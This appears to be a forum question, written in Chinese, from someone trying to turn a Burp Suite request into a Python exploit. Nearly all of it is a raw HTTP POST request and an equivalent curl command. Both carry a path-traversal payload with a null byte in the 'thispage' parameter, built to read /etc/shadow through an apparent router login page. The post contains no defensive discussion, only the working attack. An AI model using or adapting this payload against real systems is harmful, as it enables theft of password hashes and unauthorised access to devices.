因此，我试图为一个基本的burp请求编写一个基本的python漏洞，但是我无法理解。在

我的要求是：

POST /index.php HTTP/1.1
Host: <ip>:<port>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<ip>:<port>/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=

我试着在下面的脚本中得到同样的输出。在

curl漏洞是：

curl -i -s -k  -X $'POST' \
    -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Referer: https://<ip>:<port>/index.php' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary $'USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=' \
    $'https://<ip>:<port>/index.php'